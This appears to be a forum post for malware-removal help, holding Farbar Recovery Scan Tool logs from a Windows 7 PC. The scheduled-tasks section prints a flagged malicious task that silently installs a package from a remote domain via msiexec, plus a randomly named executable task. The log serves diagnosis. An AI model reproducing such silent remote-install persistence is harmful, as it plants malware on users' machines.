2019-03-01 13:40 - 2009-07-13 23:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-03-01 13:37 - 2011-04-12 04:10 - 000747394 _____ C:\Windows\system32\perfh00A.dat
2019-03-01 13:37 - 2011-04-12 04:10 - 000158866 _____ C:\Windows\system32\perfc00A.dat
2019-03-01 13:37 - 2009-07-14 00:13 - 001676878 _____ C:\Windows\system32\PerfStringBackup.INI
2019-03-01 13:37 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\inf
2019-03-01 13:33 - 2018-11-13 12:59 - 000000000 ____D C:\ProgramData\NVIDIA
2019-03-01 13:33 - 2009-07-14 00:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-25 20:26 - 2018-12-05 21:48 - 000000000 ____D C:\Users\Michael\AppData\Roaming\DAEMON Tools Lite
2019-02-25 19:31 - 2018-11-13 00:14 - 000000000 ____D C:\Users\Michael\AppData\Local\ElevatedDiagnostics
2019-02-23 21:28 - 2018-11-13 13:32 - 000000000 ____D C:\Games
2019-02-23 21:10 - 2018-11-13 12:18 - 000000000 ____D C:\Windows\pss
2019-02-23 17:11 - 2009-07-13 22:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2019-02-21 18:05 - 2018-11-13 00:11 - 000108360 _____ C:\Users\Michael\AppData\Local\GDIPFONTCACHEV1.DAT
2019-02-20 23:40 - 2018-11-13 12:29 - 000000000 ____D C:\Users\Michael\AppData\Local\Google
2019-02-20 23:39 - 2018-11-13 12:29 - 000000000 ____D C:\Program Files (x86)\Google
2019-02-20 23:35 - 2018-11-13 12:30 - 000003534 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2019-02-20 23:35 - 2018-11-13 12:29 - 000003406 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2019-02-20 23:34 - 2009-07-13 23:45 - 000414192 _____ C:\Windows\system32\FNTCACHE.DAT
2019-02-20 23:20 - 2018-11-12 17:59 - 000000000 ____D C:\Windows\Panther
2019-02-20 23:08 - 2018-11-13 00:07 - 000001431 _____ C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-02-20 23:08 - 2018-11-13 00:07 - 000001397 _____ C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2019-02-20 22:21 - 2018-11-13 00:07 - 000000000 ____D C:\Users\Michael
2019-02-20 21:48 - 2018-11-13 14:28 - 000000000 ____D C:\Users\Michael\AppData\Roaming\WinRAR
2019-02-20 21:48 - 2018-11-13 14:28 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2019-02-20 21:48 - 2018-11-13 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2019-02-02 13:42 - 2011-04-12 04:20 - 000000000 ____D C:\Windows\ShellNew
2019-02-02 13:42 - 2009-07-13 22:20 - 000000000 ____D C:\Program Files\Common Files\Microsoft Shared
2019-02-02 13:41 - 2009-07-14 00:32 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-02-02 13:40 - 2009-07-13 22:20 - 000000000 ____D C:\Program Files\Common Files\System
2019-02-02 13:40 - 2009-07-13 21:34 - 000000478 _____ C:\Windows\win.ini
2019-02-02 06:30 - 2018-11-13 12:58 - 000000000 ____D C:\ProgramData\Package Cache
2019-02-01 20:23 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\LiveKernelReports
2019-02-01 18:24 - 2018-12-05 22:02 - 001649848 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2019-02-01 17:47 - 2018-11-13 14:28 - 000000000 ____D C:\Program Files (x86)\WinRAR

==================== Files in the root of some directories =======

2019-02-20 22:20 - 2019-02-20 22:21 - 006161408 _____ () C:\Users\Michael\AppData\Local\dump007.dat
2019-02-20 22:03 - 2019-02-20 22:03 - 000000003 _____ () C:\Users\Michael\AppData\Local\wbem.ini

Some files in TEMP:
====================
2019-02-25 23:03 - 2019-02-28 20:43 - 000000000 ____D () C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-02-22 00:32

==================== End of FRST.txt ============================
#8

aca va el otro:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28.02.2019 01
Ran by Michael (01-03-2019 14:02:21)
Running from C:\Users\Michael\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2018-11-13 05:07:08)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-3080345679-4159888177-3250997579-500 - Administrator - Disabled)
Invitado (S-1-5-21-3080345679-4159888177-3250997579-501 - Limited - Disabled)
Michael (S-1-5-21-3080345679-4159888177-3250997579-1000 - Administrator - Enabled) => C:\Users\Michael

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.010.20098 - Adobe Systems Incorporated)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Biblioteca de autenticación de AD para SQL Server (HKLM\...\{89F68765-728E-41C6-949F-8E3328E38F65}) (Version: 13.1.4001.0 - Microsoft Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.29 - Piriform)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
Compresor WinRAR (HKLM-x32\...\WinRAR archiver) (Version:  - )
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.40.1.0127 - DT Soft Ltd)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
Discord (HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\...\Discord) (Version: 0.0.304 - Discord Inc.)
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.119 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.115 - Google Inc.) Hidden
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{BD49AE09-95E2-4E90-A867-419F89195D45}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{E15790DB-C145-4862-83CD-7E0173E0D04F}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
IIS 10.0 Express (HKLM\...\{4E0AF984-1437-42DC-A8E4-A6EE920DDFAF}) (Version: 10.0.1743 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - ) Hidden
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - ) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
Java(TM) SE Development Kit 11.0.2 (64-bit) (HKLM\...\{07E85AEA-1F8D-5F49-8CC8-319389751152}) (Version: 11.0.2.0 - Oracle Corporation)
JCreator LE 5.00 (HKLM-x32\...\JCreator LE_is1) (Version:  - Xinox Software)
Kits Configuration Installer (HKLM-x32\...\{29B915AE-013F-151F-3E61-67F7363C3A09}) (Version: 10.1.17763.132 - Microsoft) Hidden
Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes)
Microsoft .NET Core SDK - 2.1.202 (x64) (HKLM-x32\...\{06b884b0-4947-4439-859f-098e431012d6}) (Version: 2.1.202 - Microsoft Corporation)
Microsoft .NET Core SDK 2.1.503 (x64) (HKLM-x32\...\{ce5280a9-88d6-42e4-90bc-8399a3f94460}) (Version: 2.1.503 - Microsoft Corporation)
Microsoft .NET Framework 4.7.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft .NET Framework 4.7.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Azure Authoring Tools - v2.9.5.3 (HKLM\...\{086C537B-DE1A-4A11-8441-6AAF076174B8}) (Version: 2.9.8699.20 - Microsoft Corporation)
Microsoft Azure Compute Emulator - v2.9.5.3 (HKLM\...\Microsoft Azure Compute Emulator - v2.9.5.3) (Version: 2.9.8699.20 - Microsoft Corporation)
Microsoft Azure Libraries for .NET – v2.9 (HKLM\...\{C5C91AA6-3E83-430E-8B7A-6B790083F28D}) (Version: 3.0.0127.060 - Microsoft Corporation)
Microsoft Azure Storage Emulator - v5.7 (HKLM-x32\...\Microsoft Azure Storage Emulator - v5.7) (Version: 5.7.18218.1723 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{15A835D2-48C4-4C13-8D7F-C2742104D2D1}) (Version: 11.3.6518.0 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB (HKLM\...\{0CA7D28F-F81A-42A2-B14B-CABE07F04282}) (Version: 13.1.4001.0 - Microsoft Corporation)
Microsoft System CLR Types para SQL Server vNext CTP1.6 (HKLM\...\{423815CE-0004-481F-B3D3-7574EE25924A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types para SQL Server vNext CTP1.6 (HKLM-x32\...\{E4839F78-C3C2-493F-BB2F-472F6BBD2ED6}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27024 (HKLM-x32\...\{5fb2083a-f3cc-4b78-93ff-bd9788b5de01}) (Version: 14.16.27024.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27024 (HKLM-x32\...\{2ff11a2a-f7ac-4a6c-8cd4-c7bb974f3642}) (Version: 14.16.27024.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1095.110 - Microsoft Corporation)
Microsoft Web Deploy 4.0 (HKLM\...\{AEA6EBD0-7E59-46C0-8B5E-1715BC58DC45}) (Version: 10.0.1994 - Microsoft Corporation)
MotioninJoy Gamepad tool 0.7.1001 (HKLM\...\{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1) (Version: 0.7.1001 - www.motioninjoy.com)
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
NVIDIA Controlador de 3D Vision 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.72 - NVIDIA Corporation)
NVIDIA Controlador de audio HD 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA Controlador de gráficos 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.72 - NVIDIA Corporation)
NVIDIA Controlador de la controladora 3D Vision 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA Software del sistema PhysX 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Panel de control de NVIDIA 364.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 364.72 - NVIDIA Corporation) Hidden
Paquete acumulativo de Intellisense de Microsoft .NET Framework para Visual Studio (español) (HKLM-x32\...\{A8F7ACD7-A4E4-42FD-A978-DB6488DD6B3A}) (Version: 4.7.02558 - Microsoft Corporation) Hidden
Paquete de compatibilidad redirigido de documentación de Microsoft .NET Framework 4.7.1 (español) (HKLM-x32\...\{927FF4FD-8E47-4022-8545-22FD78FBC2AB}) (Version: 4.7.02558 - Microsoft Corporation) Hidden
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version:  - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.75.827.2013 - Realtek)
RegSeeker (HKLM-x32\...\RegSeeker) (Version: 2.55.0607 - HoverDesk)
Resident Evil HD Remaster (HKLM-x32\...\Resident Evil HD Remaster_is1) (Version:  - )
RuneScape Launcher 2.2.4 (HKLM\...\RuneScape Launcher_is1) (Version: 2.2.4 - Jagex Ltd)
ScpToolkit (HKLM\...\{AC052048-9828-45E3-872B-04CE30A3B58B}) (Version: 1.6.238.16010 - Nefarius Software Solutions)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK de Microsoft .NET Framework 4.6.1 (español) (HKLM-x32\...\{07570008-8840-4A14-A752-1367157138A5}) (Version: 4.6.01055 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
Unity (HKLM-x32\...\Unity) (Version: 2018.3.0f2 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{0460C87B-7F4C-3170-FAC9-B7A6AE5CE4E9}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
vcpp_crt.redist.clickonce (HKLM-x32\...\{32DF9B1B-E622-4385-99E0-02461A428363}) (Version: 14.16.27012 - Microsoft Corporation) Hidden
Visual Studio Community 2017 (HKLM-x32\...\031fe2fc) (Version: 15.9.28307.344 - Microsoft Corporation)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS WCF Debugging (HKLM\...\{14AF842C-675E-4268-B493-EB76D9B465A8}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{340226AB-D0EF-4715-A331-AB3A416B5018}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{E70CC1B8-7ED5-4495-9C52-603FE87F38F4}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.5.1 (HKLM\...\VulkanRT1.0.5.1) (Version: 1.0.5.1 - LunarG, Inc.)
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{1E76DFA7-96F3-4281-8E41-8A226C3E42EE}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Xamarin PCL Profiles v1.0.9 (HKLM-x32\...\{5E6844AB-A867-419C-A376-B12B574AA5F7}) (Version: 1.0.9.0 - Xamarin) Hidden
Xamarin Remoted iOS Simulator (HKLM-x32\...\{5DE98E3F-9A5C-48B7-B039-8E0FB2D68AEA}) (Version: 1.3.0.8 - Xamarin) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2016-03-21] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-19] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {19542A6A-D51F-4FDD-A211-C054D88E3E01} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe (Piriform Ltd -> Piriform Ltd)
Task: {2E5A82F9-74BA-4BBA-80F7-7988323D2436} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {36862642-B4E0-4EE1-8C8A-BAB564791EF6} - System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => "msiexec" -q -i hxxps://refreshnerer711.info/mp2FA19Hb.GWj <==== ATTENTION
Task: {44D5472E-7EC8-4C26-8644-3C0782EE11D1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {5D11E411-A841-43AC-AF9A-BFF0D70F52BB} - System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe
Task: {60E94CE0-3E18-4569-B0E1-70DED1E5522E} - System32\Tasks\updater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe (Nefarius Software Solutions) [File not signed]
Task: {D16DA545-16D0-4CB3-A708-D018659DF49E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

==================== Loaded Modules (Whitelisted) ==============

2016-01-10 13:52 - 2016-01-10 13:52 - 000389632 _____ (Scarlet.Crush Productions) [File not signed] C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe
2019-02-23 17:10 - 2019-02-23 17:10 - 000041472 _____ (Scarlet.Crush Productions) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ScpService\69414e848c0008fd8e9a0e21225abd93\ScpService.ni.exe
